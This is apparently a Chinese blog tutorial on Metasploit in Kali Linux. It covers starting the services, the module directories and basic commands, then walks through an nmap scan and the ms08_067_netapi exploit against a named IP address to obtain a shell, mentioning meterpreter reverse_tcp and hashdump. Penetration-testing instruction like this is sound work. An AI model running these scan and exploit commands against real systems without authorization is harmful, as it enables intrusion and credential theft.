kali漏洞利用之Metasploit实战

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。

1.启动服务:

在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录
这里写图片描述
2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework
这里写图片描述
比如modules中,是我们在msf中经常会利用到的一些工具
这里写图片描述
auxiliary:辅助模块

encoders:供msfencode编码工具使用,具体可使用msfencode -l

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:

msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)

msfconsole:

开启metasploit的console

4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22

这里写图片描述
可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的界面
这里写图片描述
然后就use其中一个版本

use exploit/windows/smb/ms08_067_netapi

查看一些参数
这里写图片描述
可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置

set RHOST 222.28.136.22 

选择payload
这里写图片描述
设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell

  • 4
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值